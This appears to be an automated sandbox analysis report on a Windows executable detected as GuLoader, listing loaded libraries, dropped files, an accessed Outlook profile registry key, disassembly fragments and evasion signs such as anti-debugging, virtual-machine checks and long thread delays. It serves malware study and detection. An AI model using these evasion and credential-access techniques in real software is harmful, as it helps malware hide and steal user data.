            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Bakteriemaalinger133\drilagtig\outwar\Bortlodde.iniJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: 4DttVpYJtB.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: wntdll.pdbUGP source: 4DttVpYJtB.exe, 00000004.00000003.396625736882.0000000036C94000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000002.396747642012.000000003712D000.00000040.00001000.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000002.396747642012.0000000037000000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 4DttVpYJtB.exe, 4DttVpYJtB.exe, 00000004.00000003.396625736882.0000000036C94000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000002.396747642012.000000003712D000.00000040.00001000.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000002.396747642012.0000000037000000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000002.00000002.396469160772.00000000065C7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 2_2_73131BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_73131BFF
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 2_2_731330C0 push eax; ret 2_2_731330EE
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370308CD push ecx; mov dword ptr [esp], ecx4_2_370308D6
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_035E21AD pushad ; retf 0004h6_2_035E223F
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036108CD push ecx; mov dword ptr [esp], ecx6_2_036108D6
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_035E97A1 push es; iretd 6_2_035E97A8
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B84080 push esp; ret 6_2_00B840E4
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B831B0 push es; iretd 6_2_00B83217
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B751AC push ecx; ret 6_2_00B751B4
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B75195 pushfd ; ret 6_2_00B75196
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B8C18C push 8CF22550h; iretd 6_2_00B8C1A5
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B8C23E push edi; ret 6_2_00B8C23F
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B90710 push FFFFFF9Eh; ret 6_2_00B907F9
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B848F0 push ecx; iretd 6_2_00B84964
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B818C0 push ecx; retn 1B4Bh6_2_00B818F0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B79877 pushfd ; ret 6_2_00B79879
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B849A3 push ecx; iretd 6_2_00B84964
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B81AB6 push 4BFECCB1h; ret 6_2_00B81ABB
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B8BD05 push esi; retf 6_2_00B8BD08
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B74EC0 push edi; retf 6_2_00B74ECA
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B85F50 push es; iretd 6_2_00B85F75
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B85F50 push esp; retf 2229h6_2_00B85FED
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B85F43 push es; iretd 6_2_00B85F75
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0393631C push A1C13C60h; retf 6_2_0393634A
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0393C1DB push ebp; retf 6_2_0393C1DD
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_039350D2 push edi; retf 6_2_039350D3
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03935719 push ebp; ret 6_2_0393571A
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03934BA4 push edi; ret 6_2_03934BBD
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03933A8B push ecx; ret 6_2_03933A93
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0393B83A pushad ; retf 6_2_0393B83D
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0393BFB6 push esp; ret 6_2_0393BFBA
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03930DFB push ebx; ret 6_2_03930DFC
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeFile created: C:\Users\user\AppData\Local\Temp\nsg52D8.tmp\LangDLL.dllJump to dropped file
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeFile created: C:\Users\user\AppData\Local\Temp\nsg52D8.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeAPI/Special instruction interceptor: Address: 6AED437
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeAPI/Special instruction interceptor: Address: 316D437
            Source: C:\Windows\SysWOW64\nslookup.exeAPI/Special instruction interceptor: Address: 7FFE875AD144
            Source: C:\Windows\SysWOW64\nslookup.exeAPI/Special instruction interceptor: Address: 7FFE875B0594
            Source: C:\Windows\SysWOW64\nslookup.exeAPI/Special instruction interceptor: Address: 7FFE875AD764
            Source: C:\Windows\SysWOW64\nslookup.exeAPI/Special instruction interceptor: Address: 7FFE875AD324
            Source: C:\Windows\SysWOW64\nslookup.exeAPI/Special instruction interceptor: Address: 7FFE875AD364
            Source: C:\Windows\SysWOW64\nslookup.exeAPI/Special instruction interceptor: Address: 7FFE875AD004
            Source: C:\Windows\SysWOW64\nslookup.exeAPI/Special instruction interceptor: Address: 7FFE875AFF74
            Source: C:\Windows\SysWOW64\nslookup.exeAPI/Special instruction interceptor: Address: 7FFE875AD6C4
            Source: C:\Windows\SysWOW64\nslookup.exeAPI/Special instruction interceptor: Address: 7FFE875AD864
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37071763 rdtsc 4_2_37071763
            Source: C:\Windows\SysWOW64\nslookup.exeWindow / User API: threadDelayed 9710Jump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsg52D8.tmp\LangDLL.dllJump to dropped file
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsg52D8.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeAPI coverage: 0.1 %
            Source: C:\Windows\SysWOW64\nslookup.exeAPI coverage: 2.1 %
            Source: C:\Windows\SysWOW64\nslookup.exe TID: 7836Thread sleep count: 120 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exe TID: 7836Thread sleep time: -240000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exe TID: 7836Thread sleep count: 9710 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exe TID: 7836Thread sleep time: -19420000s >= -30000sJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe TID: 4128Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\nslookup.exeLast function: Thread delayed
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 2_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_00405D74
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 2_2_0040699E FindFirstFileW,FindClose,2_2_0040699E
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 2_2_0040290B FindFirstFileW,2_2_0040290B
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B8C8D0 FindFirstFileW,FindNextFileW,FindClose,6_2_00B8C8D0
            Source: 4DttVpYJtB.exe, 00000004.00000002.396735730426.0000000006EB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW7
            Source: 4DttVpYJtB.exe, 00000004.00000002.396735730426.0000000006E77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX2
            Source: 4DttVpYJtB.exe, 00000004.00000003.396626749134.0000000006ED8000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000002.396735895444.0000000006ED8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeAPI call chain: ExitProcess graph end nodegraph_2-4504
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeAPI call chain: ExitProcess graph end nodegraph_2-4286
            Source: C:\Windows\SysWOW64\nslookup.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37071763 rdtsc 4_2_37071763
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370734E0 NtCreateMutant,LdrInitializeThunk,4_2_370734E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 2_2_73131BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_73131BFF
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703D700 mov ecx, dword ptr fs:[00000030h]4_2_3703D700
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370F970B mov eax, dword ptr fs:[00000030h]4_2_370F970B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370F970B mov eax, dword ptr fs:[00000030h]4_2_370F970B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702B705 mov eax, dword ptr fs:[00000030h]4_2_3702B705
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702B705 mov eax, dword ptr fs:[00000030h]4_2_3702B705
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702B705 mov eax, dword ptr fs:[00000030h]4_2_3702B705
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702B705 mov eax, dword ptr fs:[00000030h]4_2_3702B705
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370EF717 mov eax, dword ptr fs:[00000030h]4_2_370EF717
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37059723 mov eax, dword ptr fs:[00000030h]4_2_37059723
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B174B mov eax, dword ptr fs:[00000030h]4_2_370B174B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B174B mov ecx, dword ptr fs:[00000030h]4_2_370B174B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37063740 mov eax, dword ptr fs:[00000030h]4_2_37063740
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3706174A mov eax, dword ptr fs:[00000030h]4_2_3706174A
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F75B mov eax, dword ptr fs:[00000030h]4_2_3702F75B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F75B mov eax, dword ptr fs:[00000030h]4_2_3702F75B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F75B mov eax, dword ptr fs:[00000030h]4_2_3702F75B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F75B mov eax, dword ptr fs:[00000030h]4_2_3702F75B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F75B mov eax, dword ptr fs:[00000030h]4_2_3702F75B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F75B mov eax, dword ptr fs:[00000030h]4_2_3702F75B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F75B mov eax, dword ptr fs:[00000030h]4_2_3702F75B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F75B mov eax, dword ptr fs:[00000030h]4_2_3702F75B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F75B mov eax, dword ptr fs:[00000030h]4_2_3702F75B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37071763 mov eax, dword ptr fs:[00000030h]4_2_37071763
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37071763 mov eax, dword ptr fs:[00000030h]4_2_37071763
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37071763 mov eax, dword ptr fs:[00000030h]4_2_37071763
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37071763 mov eax, dword ptr fs:[00000030h]4_2_37071763
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37071763 mov eax, dword ptr fs:[00000030h]4_2_37071763
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37071763 mov eax, dword ptr fs:[00000030h]4_2_37071763
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37061796 mov eax, dword ptr fs:[00000030h]4_2_37061796
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37061796 mov eax, dword ptr fs:[00000030h]4_2_37061796
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3710B781 mov eax, dword ptr fs:[00000030h]4_2_3710B781
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3710B781 mov eax, dword ptr fs:[00000030h]4_2_3710B781
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370FD7A7 mov eax, dword ptr fs:[00000030h]4_2_370FD7A7
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370FD7A7 mov eax, dword ptr fs:[00000030h]4_2_370FD7A7
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370FD7A7 mov eax, dword ptr fs:[00000030h]4_2_370FD7A7
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_371017BC mov eax, dword ptr fs:[00000030h]4_2_371017BC
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370EF7CF mov eax, dword ptr fs:[00000030h]4_2_370EF7CF
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370337E4 mov eax, dword ptr fs:[00000030h]4_2_370337E4
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370337E4 mov eax, dword ptr fs:[00000030h]4_2_370337E4
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370337E4 mov eax, dword ptr fs:[00000030h]4_2_370337E4
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370337E4 mov eax, dword ptr fs:[00000030h]4_2_370337E4
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370337E4 mov eax, dword ptr fs:[00000030h]4_2_370337E4
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370337E4 mov eax, dword ptr fs:[00000030h]4_2_370337E4
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370337E4 mov eax, dword ptr fs:[00000030h]4_2_370337E4
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370377F9 mov eax, dword ptr fs:[00000030h]4_2_370377F9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370377F9 mov eax, dword ptr fs:[00000030h]4_2_370377F9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C3608 mov eax, dword ptr fs:[00000030h]4_2_370C3608
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C3608 mov eax, dword ptr fs:[00000030h]4_2_370C3608
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C3608 mov eax, dword ptr fs:[00000030h]4_2_370C3608
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C3608 mov eax, dword ptr fs:[00000030h]4_2_370C3608
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C3608 mov eax, dword ptr fs:[00000030h]4_2_370C3608
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C3608 mov eax, dword ptr fs:[00000030h]4_2_370C3608
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705D600 mov eax, dword ptr fs:[00000030h]4_2_3705D600
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705D600 mov eax, dword ptr fs:[00000030h]4_2_3705D600
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B9603 mov eax, dword ptr fs:[00000030h]4_2_370B9603
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370EF607 mov eax, dword ptr fs:[00000030h]4_2_370EF607
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3706360F mov eax, dword ptr fs:[00000030h]4_2_3706360F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37037623 mov eax, dword ptr fs:[00000030h]4_2_37037623
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DD62C mov ecx, dword ptr fs:[00000030h]4_2_370DD62C
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DD62C mov ecx, dword ptr fs:[00000030h]4_2_370DD62C
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DD62C mov eax, dword ptr fs:[00000030h]4_2_370DD62C
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37035622 mov eax, dword ptr fs:[00000030h]4_2_37035622
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37035622 mov eax, dword ptr fs:[00000030h]4_2_37035622
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3706F63F mov eax, dword ptr fs:[00000030h]4_2_3706F63F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3706F63F mov eax, dword ptr fs:[00000030h]4_2_3706F63F
